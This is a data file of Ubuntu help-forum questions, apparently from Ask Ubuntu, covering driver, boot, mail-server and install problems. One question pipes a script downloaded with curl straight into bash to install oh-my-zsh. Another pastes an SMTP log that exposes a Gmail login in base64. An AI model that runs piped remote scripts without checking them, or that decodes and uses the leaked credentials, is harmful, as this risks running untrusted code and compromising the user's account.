483744	config.status : error : can not find input file : `makefile.in '	i 'm trying to install mod_wsgi on ubuntu 12.04 . here is the set of commands that i 'm following : wget http : //modwsgi.googlecode.com/files/mod_wsgi-3.4.tar.gz tar xvfz mod_wsgi-3.4.tar.gz cd mod_wsgi-3.4 ./configure make make install echo `` loadmodule wsgi_module /usr/lib/apache2/modules/mod_wsgi.so '' > /etc/apache2/mods-available/wsgi.load a2enmod wsgi a2dissite default however , when i do ./configure , it gives me this output : checking for apxs2 ... no checking for apxs ... no checking apache version ... ./configure : line 1747 : apxs : command not found ./configure : line 1747 : apxs : command not found ./configure : line 1748 : apxs : command not found ./configure : line 1751 : / : is a directory checking for python ... /usr/bin/python ./configure : line 1920 : apxs : command not found configure : creating ./config.status config.status : error : can not find input file : `makefile.in' i 'm following this tutorial in case you are curious : http : //www.lennu.net/2012/05/14/django-deployement-installation-to-ubuntu-12-dot-04-server/
483747	touchpad and touchscreen issues on dell inspiron 15 7537	i have a dell inspiron 15 7537 with ubuntu 14.04 and the touchpad ( clickpad ) not working right is driving me crazy and makes the computer very frustrating to use . i read about this issue here and make the changes but it 's still far from perfect . is there anyway to get this touchpad working properly ? are there drivers for ubuntu that i can download ? it really makes the computer difficult to use . i have to click in a certain spot or it makes the mouse pointer jump somewhere else on the screen clicking and dragging is difficult to get working , etc . it 's like the pad will only take the drag actions on a certain part of the pad . also is there a way to get the touchscreen working correctly as it does in windows 8 ( like pinch to zoom , being able to just scroll a webpage without using the scrollbar ) ?
483748	nagios configuration make error	i 'm configuring nagios on ubuntu 14.04 . when i use this command inside downloads : make all appear this error : make : * * * no rule to make target 'all ' . stop . any solutions ?
483751	whats best flavor for the lenovo s10 netbook ?	for creating live usb that has the least amount of compatibility issues , if any ? specs : lenovo ideapad s10 4333-36u netbook intel atom n270 1.6ghz 1gb ddr2 160gb hdd 10.1 '' wsvga windows xp home
483759	ubuntu 14.04 will not load except for empty desktop	when i start up my computer , this is exactly what happens : grub loads , and i select ubuntu . ubuntu is loading , and before step 3 a tty1 screen shows up , then goes away ubuntu login screen shows up , and i type in my password . problematic step : 4 . ubuntu shows only a bare desktop . i use my ubuntu a lot , and a few days ago i saw that the grub version showed beta in it , and also the commands use to boot it up are different when i saw the commands used to boot up ubuntu 13.10 .
483764	key-shortcut accessible command-history ( in gnome-terminal ) for irssi sessions needed !	i use gnome-terminal in combination with irssi and i am wondering if there 's anything like .bash_history logfile for irssi , that can be used/implemented/set up , that enables one to retrieve previously typed commands , like /server xxx , /j # channel etc.. also in a later anew started session , by using gnome-terminals standard key-shortcuts like â and â . it is really troublesome to repeatedly type all the commands again and again while not being connected to any /server the next day , so any help here is much appreciated . -- thank you ! ! edit : when i am prompted to connect to any /server of my choice , i would like to use the key-shortcut prior mention , that then brings up my previous choices of connected servers/commands , like /server irc.blah01.com , /server irc.blah02.com , /server irc.blah03.com etc.. i simply can then skip through and confirm with enter instead of typing the exact command and server address again and again . ( i know about the auto-connect function , but i prefer the other option , if it is one ) .
483767	ubuntu 14.04 just reboots on `` install ubuntu '' ( intel db85fl )	i created an ubuntu 14.04 dvd and tried to install ubuntu but it gets to the installation screen . if i click `` install to hard disk '' it immediately just reboots . i 've tried various bios settings with no luck . i have an intel db85fl with i5 cpu and 8gig ram . any ideas ?
483780	how to set headset ( byte corseca bluetooth headset ) as default audio device ?	ubuntu 14.04 , dell inspiron 15r . dell byte corseca bluetooth headset ( dm5710bt ) this is how i always open sound-settings , and manually set the headset as current audio device . help me to troubleshoot this .
483781	does enigmail defaultly check keyservers upon receiving signed emails ?	how does enigmail acquire the public key for someone who sends you an encrypted email ? do you have to import it yourself or does it get the key from a keyserver ?
483783	accepting a host key on the device and the workstation	i am trying to install the ubuntu touch on my samsung galaxy nexus running android 4.3 . however , i am having problems understanding how to accept the host key on my device , and what exactly the workstation is and where i can get it . 'on either android version you must then enable usb debugging via settings > developer options > usb debugging . you will also need to accept a host key on the device . on the workstation- > adb kill-server ; adb start-server' this is the step i am having problems with . i have enabled usb debbuging but i do n't know how to do the rest . can you please give me step by step instructions , because i am a newbie to all this . thank you in advance !
483786	hibernate menu not visible when other users logged in	i 'm aware hibernate is disabled by default in 14.04 . i have enabled it by following instructions here : https : //help.ubuntu.com/14.04/ubuntu-help/power-hibernate.html . but i have noticed that when there are multiple logged in users , only the first user will see hibernate menu . all these users can see the hibernate menu when they are the only user in the system though . is this a bug ?
483797	enable zsh prompt username	so i just installed zsh , and it shows for each command arrow and then ~ . how do i enable my username @ computername or something similar ? i am reading https : //wiki.archlinux.org/index.php/zsh but can not figure this out . that 's how it looks now :
483798	i get the prompt ( myusername ) : ~ $ when trying to start my laptop ( ubuntu 12.04.4 )	when i turned on my laptop this morning , it asked me to log in ( which it normally does n't do ) and once i logged in , it showed this : ( myusername ) : ~ $ i 'm using ubuntu 12.04.4 , and do n't know what command i have to type in to get to my desktop page .
483799	lxdm + awesomewm - unable to use keyboard until application opened	i have just installed lxdm alongside awesome , and lxdm works fine . unfortunately , there is a really small problem that is n't that bad ( but fairly annoying ) that i have no idea how to go about fixing . after i login through lxdm , it starts awesome just fine , except i can not use the keyboard . i can , however , open up web browsers , terminals , and such by right clicking . after i open up an application ( ex . epiphany ) , i can use the keyboard on awesome . how do i fix this ? i have no idea where to go . since i am not using the default window manager and login managers , i think i may need to post this somewhere else . if that is the case , could someone point me to a better place to put this ? note : if this has anything to do with the awesome config , i can upload it if need be .
483800	dual pane does not work in thunar ?	i have thunar 1.6.3 but dual pane ( comes up with f3 in nautilus ) does not work . how do i enable it ? i only have tabs ! ? running ubuntustudio 14.04
483805	is wubi vulnerable to gozeus and cryptolocker etc ?	the gameoverzeus ( p2pzeus ) malware , and associated cryptolocker , has been blocked temporarily , but may resume its potency . windows is said to be vulnerable to it , but not linux . so is ubuntu under wubi safe or not ?
483806	expo ( workplaces view ) is n't working	i am on ubuntu 14.04 64bits , with effects enabled and window spread working . unfortunately the expo view is n't working and i do n't know why . 'super + s ' is n't working and so is n't the workplaces icon in the launcher nor the hot corner i had set up . switching places with alt + ctrl + arrow key does work but i ca n't trigger the expo view . i am suspecting this has something to do with the fact that i recently installed easy stroke ( from source ) but even disabling it , rebooting the computer and running 'unity -- replace ' will fix the issue . any ideas ?
483815	evolution does not retrieve mails from my gmail account	i just downloaded and installed evolution . after providing the email account details it is not retrieve my mails from the account . how can i correct this ?
483816	formatting ubuntu	i had dual boot with windows and ubuntu for a long time now . today i decided to uninstall windows and format ubuntu . the first thing i did was remove the partion where the windows os was installed . so far so good . secondly , i created a new backup partion with all the files i needed from both os . now my hd has 4 partions . one with ubuntu installed one with my backup files one 200gb which is empty and a 80gb one to install my brand new ubuntu . then i downloaded ubuntu minimal install and bruned it to a dvd . when i try to boot from dvd nothing happens . the grub still comes up ( even though the only option is ubuntu ) . how should i proceed ? all i want to do is : install ubuntu 13.04 minimal . do n't overwrite my backup partion . thanks in advance .
483817	startup disk creator does not see volumes on my 32 gb usb flash drive	i am trying to create a bootable ubuntu 14.04 lts os on a 32 gb flash drive . i have partitioned the flash drive , half in ntfs for storage , and half ext2 as the primary partition to install ubuntu . when i open startup disk creator it only sees `` lexar usb flash drive ( /dev/sdb ) '' and 0.0 b free space . i can erase the disk , but this will remove the partitions which is not what i want . the reason i want to do this is that i use a hp notebook at home which is running ubuntu 14.04 lts , and an imac running mac os x 10.9 at work . i want to be able to use the same software at work and home . the usb ubuntu needs to be bootable from the imac , and the data partiton needs to be available from this , and on my hp notebook . any help or suggestions would be much appreciated .
483821	howto specify library location when compiling	how do i specify the location of a library when running ./configure ? i have searched around and think the answer lies in setting ldflags and cppflags , but i , m not sure how to do it . specifically , i have compiled libx264 and i now want to compile libav and enable libx264 support , but dont know how to point ./configure to my libx264 include and lib folders . thanks .
483823	is it possible to have audio output source switch automatically with xonar dg ?	i have an asus xonar dg card ( which apparently has only been recently support as of kernel 3.13 ) . i got the front audio working by ( go figure ) plugging the cases digital audio cord directly into the soundcard . when i plug my headphones into the front port i have to manually select to output the sound there using the card . i know this works in windows , so the functionality is there - does anyone know how to do it in linux ?
483824	run program with only 1 cpu core	i 'm trying to run a bunch of scripts related to a gaming server in terminator . the only problem is when i do this , terminator detects all my cpu cores and the pc lags . is there any way to start it up but trick it into thinking i only have 1 cpu core ?
483828	mouse randomly stops responding	i am not aware of any system change that could cause this , but sometimes my mouse just stops responding . its light is still on so the fault is probably not in the hardware . syslog at the time the mouse dies looks like this jun 16 00:15:24 martin-mint kernel : [ 21426.913233 ] hid-generic 0003:046d : c041.0009 : ca n't reset device , 0000:00:1a.0-1.1/input0 , status -32 jun 16 00:15:24 martin-mint kernel : [ 21426.959700 ] hid-generic 0003:046d : c041.0009 : ca n't reset device , 0000:00:1a.0-1.1/input0 , status -32 jun 16 00:15:24 martin-mint kernel : [ 21426.989852 ] usb 1-1.1 : usb disconnect , device number 7 jun 16 00:15:24 martin-mint laptop-mode : laptop mode jun 16 00:15:24 martin-mint laptop-mode : enabled , not active jun 16 00:15:24 martin-mint laptop-mode : laptop mode jun 16 00:15:24 martin-mint laptop-mode : enabled , not active jun 16 00:15:24 martin-mint kernel : [ 21427.231822 ] usb 1-1.1 : new full-speed usb device number 8 using ehci-pci jun 16 00:15:25 martin-mint kernel : [ 21427.875585 ] usb 1-1.1 : new usb device found , idvendor=046d , idproduct=c041 jun 16 00:15:25 martin-mint kernel : [ 21427.875596 ] usb 1-1.1 : new usb device strings : mfr=1 , product=2 , serialnumber=0 jun 16 00:15:25 martin-mint kernel : [ 21427.875602 ] usb 1-1.1 : product : usb gaming mouse jun 16 00:15:25 martin-mint kernel : [ 21427.875607 ] usb 1-1.1 : manufacturer : logitech jun 16 00:15:25 martin-mint kernel : [ 21427.881389 ] input : logitech usb gaming mouse as /devices/pci0000:00/0000:00:1a.0/usb1/1-1/1-1.1/1-1.1:1.0/input/input24 jun 16 00:15:25 martin-mint kernel : [ 21427.881974 ] hid-generic 0003:046d : c041.000b : input , hidraw0 : usb hid v1.11 mouse [ logitech usb gaming mouse ] on usb-0000:00:1a.0-1.1/input0 jun 16 00:15:25 martin-mint kernel : [ 21428.083359 ] hid-generic 0003:046d : c041.000c : hiddev0 , hidraw1 : usb hid v1.11 device [ logitech usb gaming mouse ] on usb-0000:00:1a.0-1.1/input1 jun 16 00:15:25 martin-mint laptop-mode : laptop mode jun 16 00:15:25 martin-mint laptop-mode : enabled , not active jun 16 00:15:25 martin-mint laptop-mode : laptop mode jun 16 00:15:25 martin-mint laptop-mode : enabled , not active can somebody more experienced than me give some insight ?
483829	scsi error on write ( 196816,16 ) : [ 3 0c 00 ] medium error . write error .	i installed ubuntu 14.04 2 days ago . i just converted my 1st .avi file using devede video creator . after conversion i tried to burn the newly converted .iso file using brasero disc burner and i got this message after 2 failed attempts : scsi error on write ( 196816,16 ) : [ 3 0c 00 ] medium error . write error . any help would be gladly appreciated .
483833	deleting update cache	how can i clear the list of updates and softwares ( from an ubuntu download server ) created when sudo apt-get update is run for the first time ( after the download server is selected ) ? i do not want to delete the downloaded .deb files just the update cache created by sudo apt-get update .
483839	setup windows and linux , dual boot and a storage folder that can be written and read by both	i have just setup windows 8 + ubuntu 14.04 on dual boot on my laptop . now i 'd like to have a common storage `` partition '' where i store personal documents , movies , music , etc that can be read and written to by windows and ubuntu . doing some research , i came across this article which basically tells you to create a ntfs partition for storage , then edit the fstab file in ubuntu and edit libraries in windows . that sounds cool because i do n't have to install any third party for this but the little problem i see with this article is that it 's really old , written in 2010 , so i 'm thinking if something has changed and there 's better , more recommended ways to do that nowadays in 2014 .
483843	how to keep tor browser bundle updated	i am using ubuntu 14.04 . i decided to install the tor browser bundle today . after some quick research online i discovered this article specifically discouraging users from using the ubuntu packages as they are n't updated . the repo they operate for tor does n't include the tor browser . so i had to download it manually . i am able to run the tor browser but i 'm not able to create a shortcut to it on the launcher or figure out how to ensure i have the latest version . ( e.g . apt-get update/upgrade ) so my question is this : since the tor browser is a manual download , and not from a package repo , how do i ensure it stays up to date ? will the bundle check online each time its run ? or is it up to me now to check the tor site often to ensure i have the latest version . i 'm just curious how others are dealing with this issue .
483844	ca n't install apache2-2 on ubuntu 14.04	i just upgraded ( after a lot of fighting ) my ubuntu distro from 13.04 to 13.10 and then from 13.10 to 14.04 . i managed to make everything work , except for one thing : i ca n't find a way to install apache2.2 instead of apache2.4 , which is the default in repos for this distro . why would i want this ? it all traces back to my current work : a huge php web app which works only under php 5.3 . i tried to convince my dev team at work to migrate the code to a newer version of php but failed . the thing is , i need php 5.3 on my computer so i can develop for work , and there 's no libapache-mod-php5 for the said version which works with apache2.4 . is there a way to make this work ? i would really like to stick with apache2 for development purposes , but if there 's not another way to do this , i would consider using other web services . this question is related to my personal development computer , not a dedicated server , in case i did n't explain myself clearly enough .
483849	ubuntu 12.04 ca n't log in with correct password	for some reason i can no longer log in to my account . this happened after changing my password . sometime after that i accidentally unplugged the computer which shut it down . once restarted i could no longer log in . the weird part is that the password is definitely correct . when i purposely type in an incorrect password , the log in says it 's incorrect . when i type in the correct password , it flashes into terminal and says the following lines . mountall : plymouth command failed mountall : disconnected from plymouth after about a second it goes back to the login screen . currently using a new account . the original admin password works when i use it to change account settings within the new account and the guest account . tried changing the password back to what it was with no luck . also tried changing it to something else with no luck . i 've read about people having similar issues and i tried the following remedies i read about with no success : ctrl+alt+f1 login sudo chown -r $ user : $ user $ home ctrl+alt+f7 rm ~/.xauthority this cause it to say no such file or directory . sudo rm /home/username/ .xauthority this also cause it to say no such file or directory . sudo apt-get install -- reinstall xorg this supplies no success although this seems to have changed the text that flashed on screen from something kinda long to what it is now . when i log in through the command line my password and everything works but i get this : signature not found in user keyring perhaps try the interactive 'ecryptfs-mount-private' out of curiosity i tried typing in ecryptfs-mount-private and it asks for a login passphrase . when i type in my password it says its incorrect . or should i be putting in my encryption key ? as you can tell im a total noob at this kinda stuff so take it easy on me . i dont know why this happened after changing my password . i 've changed my password before without an issue . i 'd be happy to only rescue my files from the old account as i have my music collection in there . doing so from my newly created admin account is not possible .
483850	weird launcher bar/chrome bug , hard to describe	i have chrome locked to the launcher , but when i click it , it opens another icon on the launcher . when i hover over it , it says the name of one of my bookmarks . i 've unlocked and locked to no avail . screenshot here . the first chrome icon on launcher just says google chrome when hovered over . in the screenshot , it still says the bookmark , so it 's not changing according to what page i have open ( which is ask ubuntu in the screen ) i want to make the chrome icon launch normally again . thanks for any help .
483856	ubuntu '/home ' mount point in subfolder of shared partition ?	i have a dual-boot windows 8.1 and ubuntu 14.04 machine . currently , i have one ext4 partition that is being used as my '/home ' mount point in ubuntu , and one ntfs partition that i am using to redirect 'my documents ' and such on windows . this way both os 's are automatically using these partitions for file storage `` under the hood '' . my question is this : is there a reasonable way to make both os 's automatically use the same partition for file storage , without butting heads , and continuing this `` under the hood '' behavior ? preferably i would like to have this partition contain one folder named 'ubuntu ' and another folder named 'windows ' , with the 'ubuntu ' folder acting as the mount point for '/home ' and the 'windows ' folder containing my redirected profile folders , like in my current setup . is this possible ? i 'm guessing the format would have to be exfat or something of the sort . would there be any downsides ( such as speed loss ) from using this approach ? and if this is not very reasonable , is there another setup that would give similar effects ? edit : also , would it be reasonable to have a third folder on this partition for my dropbox files ( with each os 's dropbox program pointing to this same folder ) , so there is only one copy of my dropbox files on my disk ?
483868	is the compiled version of a binary dynamically linked to the system ssl library ?	in my case i build nginx from source and i want to confirm whether i need to rebuild it whenever a new openssl update is released . from what i understand either of these two commands can be used to show dynamically linked libraries ( with the second being safer ) : ldd /path/to/binary_file objdump -p /path/to/binary_file | grep needed if i see output like this : objdump -p nginx | grep needed | grep -i ssl needed libssl.so.1.0.0 does that mean that openssl is dynamically linked and nginx does not require a rebuild whenever the system copy of the openssl library is upgraded ( just a restart ) ? i think the answer is yes , but i 'd just like to get confirmation that is the case . thanks !
483869	dconf editor says */intel-ucode/* banned why ?	i do n't think this has previously been asked . why is /intel-ucode/ banned in dconf editor under org > settings daemon > plugins/updates ?
483872	no sound even after fresh install of ubuntu 14.04 x64	i have done everything that i could get off google to correct the sound problem but none of them is working . my last install of ubuntu had the sound working , but this one , i do n't know why it is not . pulseaudio/pavucontrol/driver manager/ unmuting alsamixer/ unmuting sound settings/ taking out the jack and plugging it again/ sound card problem -- all these possibilities i 've already eliminated . i 'm tired and frustrated . please help , my alsainfo : http : //pastebin.com/sdcs9brz
483873	error password : chsh : pam : authentication failure when try to install oh my zsh	i try to install oh my zsh . after install zsh ( sudo apt-get update & & sudo apt-get install -y zsh ) then i install sudo apt-get install -y curl then install git . the problems occurs when i try this command . curl -l https : //github.com/robbyrussell/oh-my-zsh/raw/master/tools/install.sh | bash this is the log sudo curl -l https : //github.com/robbyrussell/oh-my-zsh/raw/master/tools/install.sh | bash % total % received % xferd average speed time time time current dload upload total spent left speed 100 146 100 146 0 0 91 0 0:00:01 0:00:01 -- : -- : -- 91 100 1779 100 1779 0 0 525 0 0:00:03 0:00:03 -- : -- : -- 1416 \033 [ 0 ; 34mcloning oh my zsh ... \033 [ 0m cloning into '/home/icom3/.oh-my-zsh ' ... remote : reusing existing pack : 10101 , done . remote : total 10101 ( delta 0 ) , reused 0 ( delta 0 ) receiving objects : 100 % ( 10101/10101 ) , 1.92 mib | 172.00 kib/s , done . resolving deltas : 100 % ( 5337/5337 ) , done . checking connectivity ... done . \033 [ 0 ; 34mlooking for an existing zsh config ... \033 [ 0m \033 [ 0 ; 33mfound ~/.zshrc.\033 [ 0m \033 [ 0 ; 32mbacking up to ~/.zshrc.pre-oh-my-zsh\033 [ 0m \033 [ 0 ; 34musing the oh my zsh template file and adding it to ~/.zshrc\033 [ 0m \033 [ 0 ; 34mcopying your current path and adding it to the end of ~/.zshrc for you.\033 [ 0m \033 [ 0 ; 34mtime to change your default shell to zsh ! \033 [ 0m password : chsh : pam : authentication failure is there any idea ? note , that i have tried sudo vim /etc/pam.d/chsh then comment auth required pam_shells.so . however , the error still occur .
483875	dual boot can not boot from windows , power off in ubuntu	i tried to dual boot ubuntu with windows 7 and failed miserably , now i can not get back to windows7 and my computer constantly corrupts when running ubuntu . i am trying to install ubuntu on my hp desktop which already has windows 7 installed . i made a bootable usb using universal usb installer and burned the ubuntu desktop iso on it . before i installed ubuntu , i run the defragment program in windows 7 and then shrink the c drive which is 1.8 tb to 900gb and on the other side , i made the rest 900gb unallocated to reserver for ubuntu /boot , / and swap . then i reboot the computer , plugin the usb and try to install the ubuntu in `` something else '' while selecting the installation type . and it looks like this : some notes : all the ntfs partition are windows related partition , sda1 is probably where the bootloader goes to ? sda2 is the shrinked c drive which is has 300gb usage . sda3 is where the hp recovery goes to . i tried to create the boot folder , root folder and swap space for ubuntu ... however , 9 out of 10 times , the ubuntu installation will corrupt , the screen turn pure dark , and the desktop working led lights is on but you can not reset the machine even holding the power button ... i have to unplug the power cable . also , if you try to boot straight from the harddrive , it will go to the grub rescue mode ... also , there is no option that i can boot back to windows ... i am so confused at why the installation will fail ? ( btw , i have a gpu does n't come with the machine and it behaved fine before i tried installing ubuntu ) output from the bootrepair tool . update : using bootrepair tool to fix the error , almost no-brainer .
483876	ca n't install hp 1515 printer	i 'm not a technician and find most ubuntu instructions are incomprehensible . i bought a printer for the first time in my life today , an hp 1515 . i eliminated all microsoft stuff from my computer last year . the hp installation disc seems incompatible with ubuntu or with my toshiba satellite laptop . when i tried to understand the ubuntu help page , i was invited to upgrade from ubuntu 13.04 to 13.10 . this in turn requires me to install something . i attempted to install adobe flash player , but i could n't . this also asks me to install updates to ubuntu 13.04 . this was also impossible to understand or to do . is there a simple way to make my printer work ? i 'd like to stick with free software , but i do n't like these complications . i still have n't figured out how to double space , how to put numbers on pages , etc. , and may be forced back to microsoft if ubuntu does n't become user friendly for mere writers , not technicians . thanks to all who offer suggestions .
483877	using port 587 for secure submission	testing from swaks , mail is delayed indefinitely . i believe that the local mail server is configured correctly , as per the ehlo responses : thufir @ dur : ~ $ thufir @ dur : ~ $ telnet localhost 25 trying 127.0.0.1 ... connected to dur.bounceme.net . escape character is '^ ] ' . 220 dur.bounceme.net esmtp postfix ( ubuntu ) ehlo localhost 250-dur.bounceme.net 250-pipelining 250-size 10240000 250-vrfy 250-etrn 250-starttls 250-auth plain login 250-auth=plain login 250-enhancedstatuscodes 250-8bitmime 250 dsn quit 221 2.0.0 bye connection closed by foreign host . thufir @ dur : ~ $ thufir @ dur : ~ $ swaks -f hawat.thufir @ gmail.com -t thufir @ dur.bounceme.net -tls -s smtp.gmail.com:587 -a username : hawat.thufir password : password === trying smtp.gmail.com:587 ... === connected to smtp.gmail.com . < - 220 mx.google.com esmtp qv3sm15592694pbb.87 - gsmtp - > ehlo dur.bounceme.net < - 250-mx.google.com at your service , [ 96.55.205.166 ] < - 250-size 35882577 < - 250-8bitmime < - 250-starttls < - 250-enhancedstatuscodes < - 250 chunking - > starttls < - 220 2.0.0 ready to start tls === tls started with cipher tlsv1.2 : ecdhe-rsa-aes128-gcm-sha256:128 === tls no local certificate set === tls peer dn= '' /c=us/st=california/l=mountain view/o=google inc/cn=smtp.gmail.com '' ~ > ehlo dur.bounceme.net < ~ 250-mx.google.com at your service , [ 96.55.205.166 ] < ~ 250-size 35882577 < ~ 250-8bitmime < ~ 250-auth login plain xoauth xoauth2 plain-clienttoken < ~ 250-enhancedstatuscodes < ~ 250 chunking ~ > auth login < ~ 334 vxnlcm5hbwu6 ~ > agf3yxqudgh1zmly < ~ 334 ugfzc3dvcmq6 ~ > cmvkc3f1yxjlmtiz < ~ 235 2.7.0 accepted ~ > mail from : < hawat.thufir @ gmail.com > < ~ 250 2.1.0 ok qv3sm15592694pbb.87 - gsmtp ~ > rcpt to : < thufir @ dur.bounceme.net > < ~ 250 2.1.5 ok qv3sm15592694pbb.87 - gsmtp ~ > data < ~ 354 go ahead qv3sm15592694pbb.87 - gsmtp ~ > date : sun , 15 jun 2014 19:18:22 -0700 ~ > to : thufir @ dur.bounceme.net ~ > from : hawat.thufir @ gmail.com ~ > subject : test sun , 15 jun 2014 19:18:22 -0700 ~ > x-mailer : swaks v20130209.0 jetmore.org/john/code/swaks/ ~ > ~ > this is a test mailing ~ > ~ > . < ~ 250 2.0.0 ok 1402885114 qv3sm15592694pbb.87 - gsmtp ~ > quit < ~ 221 2.0.0 closing connection qv3sm15592694pbb.87 - gsmtp === connection closed with remote host . thufir @ dur : ~ $ thufir @ dur : ~ $ postconf shows : thufir @ dur : ~ $ thufir @ dur : ~ $ postconf -n alias_database = hash : /etc/aliases alias_maps = hash : /etc/aliases , hash : /var/lib/mailman/data/aliases append_dot_mydomain = no biff = no broken_sasl_auth_clients = yes config_directory = /etc/postfix default_transport = error home_mailbox = maildir/ inet_interfaces = all mailbox_command = mailbox_size_limit = 0 mailman_destination_recipient_limit = 1 mydestination = dur.bounceme.net , localhost.bounceme.net , localhost myhostname = dur.bounceme.net mynetworks = 127.0.0.0/8 [ : :ffff:127.0.0.0 ] /104 [ : :1 ] /128 myorigin = /etc/mailname readme_directory = no recipient_delimiter = + relay_domains = lists.dur.bounceme.net relay_transport = error relayhost = smtp_tls_note_starttls_offer = yes smtp_tls_security_level = may smtp_tls_session_cache_database = btree : $ { data_directory } /smtp_scache smtp_use_tls = yes smtpd_banner = $ myhostname esmtp $ mail_name ( ubuntu ) smtpd_recipient_restrictions = permit_sasl_authenticated , permit_mynetworks , reject_unauth_destination smtpd_relay_restrictions = permit_mynetworks permit_sasl_authenticated defer_unauth_destination smtpd_sasl_auth_enable = yes smtpd_sasl_authenticated_header = yes smtpd_sasl_local_domain = smtpd_sasl_path = private/dovecot-auth smtpd_sasl_security_options = noanonymous smtpd_sasl_type = dovecot smtpd_sender_restrictions = reject_unknown_sender_domain smtpd_tls_cafile = /etc/ssl/certs/cacert.pem smtpd_tls_auth_only = no smtpd_tls_cert_file = /etc/ssl/certs/smtpd.crt smtpd_tls_key_file = /etc/ssl/private/smtpd.key smtpd_tls_loglevel = 1 smtpd_tls_mandatory_ciphers = medium smtpd_tls_mandatory_protocols = sslv3 , tlsv1 smtpd_tls_received_header = yes smtpd_tls_security_level = may smtpd_tls_session_cache_database = btree : $ { data_directory } /smtpd_scache smtpd_tls_session_cache_timeout = 3600s smtpd_use_tls = yes tls_random_source = dev : /dev/urandom transport_maps = hash : /etc/postfix/transport thufir @ dur : ~ $ the records look ok : thufir @ dur : ~ $ thufir @ dur : ~ $ dig dur.bounceme.net ; < < > > dig 9.9.5-3-ubuntu < < > > dur.bounceme.net ; ; global options : +cmd ; ; got answer : ; ; - > > header < < - opcode : query , status : noerror , id : 938 ; ; flags : qr rd ra ; query : 1 , answer : 1 , authority : 0 , additional : 0 ; ; question section : ; dur.bounceme.net . in a ; ; answer section : dur.bounceme.net . 53 in a 96.55.205.166 ; ; query time : 12 msec ; ; server : 127.0.1.1 # 53 ( 127.0.1.1 ) ; ; when : sun jun 15 19:26:02 pdt 2014 ; ; msg size rcvd : 50 thufir @ dur : ~ $ thufir @ dur : ~ $ nslookup dur.bounceme.net server : 127.0.1.1 address : 127.0.1.1 # 53 non-authoritative answer : name : dur.bounceme.net address : 96.55.205.166 thufir @ dur : ~ $ the ubuntu guide has this to say : using port 587 for secure submission if you want to use port 587 as the submission port for smtp mail rather than 25 ( many isps block port 25 ) , you will need to edit /etc/postfix/master.cf and uncomment the line submission inet n - n - - smtpd which i have done , and yet can not receive test mail .
483886	slow desktop performance on dualscreen setup with nvidia proprietary drivers	ok so here is my situation : i have a 2 monitor setup up that works great with my windows computer . i have a nvidia gforce 650 ti boost with both monitors attached to it . i downloaded the latest version of ubuntu on a 500 gb external hard drive attached it to said computer . the instal went went fine , however afterward ubuntu started having a hard time recognizing my 2 monitor situation . then when i would turn of one of the monitors via the display setting the mouse arrow would be very laggy and would n't work well . whenever i would try fiddling with the settings it either would n't accept the changes or would get so laggy that it would force me to restart my computer . my question is this : how do i get ubuntu to allow me to use two monitors without lagging out ? is there a problem with the fact that it is downloaded on a external hard drive or is there something else i am not doing ?
483887	error formatting sd card	i 'm now trying to resize a 64 gb sd card and format it to ext4 ( i use a normal sd card reader , not a usb card reader ) in order to use it on my android device . formating it to fat32 wo n't give me a problem , my problems start if i format it to ext4 , then the sd card would show errors the sd card error that i see , is permission denied i can not include a screenshot because i formated it and it ai n't happening now but i can show you this screenshot , the sd card is formated to ext4 using gparted it clearly shows that can not write anything to the sd , as a regular user , i have to be root . edit after following sđźurf 's answer , i see edit 2 , gksudo solves few issues but when formating to ext4 i still see
483888	ubuntu live .bashrc not copied over to tty1 , but copied for telnet session	i just built a live version of ubuntu 14.04 using this guide : https : //help.ubuntu.com/community/livecdcustomizationfromscratch i edited /etc/skel/.bashrc and upon power up , i 'll be taken to the command prompt like it 's supposed to ( no gui installed ) . however , i noticed that .bashrc is not copied over to the home folder , yet it is still applying the changes i made to the one in skel - what 's up with that ? thanks ! mike
483890	trying to use pandas in python - error : wrong elf class : elfclass32	i have installed the latest version of pandas by using the following : sudo apt-get install python-pandas but i keep getting the following error message when i try to import into python : importerror : /usr/local/lib/python2.7/dist-packages/pandas-0.7.3-py2.7-linux-i686.egg/pandas/_tseries.so : wrong elf class : elfclass32 any suggestions on how to fix this ? do i need to reinstall something ? if so how do i do it ? i have tried to find how to uninstall pandas but i cant find it .
483892	low disk space on `` pbr_image '' in ubuntu 14.04	i have recently installed ubuntu 14.04 lts when i boot my laptop then a dialog box appears which shows the following output low disk space on `` pbr_image '' the volume `` pbr_image '' has only 313.4 mb disk space remainig what should i do now
483893	problem with enabling pipelight 's plugins	i just installed pipelight . i followed the instructions closely , from getting it to downloading user agent switcher . everything went smoothly and worked on firefox , however , when i went to netflix on google chrome , it asked me to download silverlight even though i already enabled it . i tried to go to a site with unity web player and the same thing happened . i am new to ubuntu , please help me out . thank you very much in advance .
483897	graphics problems in ubuntu 14.04 , distorted text	i 'm running ubuntu 14.04 with a nvidia gtx 660 graphics cards . my system had been working fine till yesterday when the graphics started going crazy ( see link attached for image ) after running the computer for like 10 minutes . im running a dual boot with windows 8 and i can use that and play games without a problem so im thinking it 's not a hardware issue . i updated the graphic cards drivers and used different drivers to no avail . i then reinstalled ubuntu , on both a different hd and on the same hd and the problem persists . i 've looked online and have n't found anything similar , any help or insights will be greatly appreciated .
483903	ubuntu 14.04 on p35k gaming laptop - internet suddenly unbearably slow	after switching to a network that someone else owns and returning to mine , the internet on my laptop is going incredibly slow . when i ping google.com , i have ~86 % packet loss , and the packets that manage to get through take a really long time to get through . i have another computer , which after pinging google.com , has a 0 % packet loss and the packets get sent and received fairly quickly . i have no idea where to go from here . i tried reconnecting and restarting my router , but that did n't work . if any other information is needed , i 'll be happy to give it to you . edit : the other computer is running osx
483906	will eol releases no longer be archived ?	according to this how to install software or upgrade from old unsupported release ? question , eol releases are archived to http : //old-releases.ubuntu.com . but currently , i can not see ubuntu 12.10 and ubuntu 13.04 to be available on this website , while all others ( since 4.10 ) are available , as you can see in the screenshot below so has canonical and/or ubuntu devel-teams decided not to archive eol releases any more ? or is it work to be done ?
483911	interface not starting on boot	i have ubuntu server 10.0.4 and asus-n53 wireless usb adapter i needed to compile source files to get the driver to work and the logical name i got for that interface was ra0 the /etc/network/interfaces file includes auto ra0 but the interface does n't start automatically when i use sudo ifconfig ra0 up the interface works without any issue i looked at /etc/udev/rules.d/70-persistent-net.rules file and it 's missing ra0 interface when i tried sudo /lib/udev/write_net_rules ra0 i 'm getting missing $ interface how to solve this problem ? thanks update 1 -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- i 'm using bonding , when i disable the bonding and use the regular configuration for /etc/network/interfaces the interface starts at boot and i 'm pretty sure the boding config is right , i used tcpdump
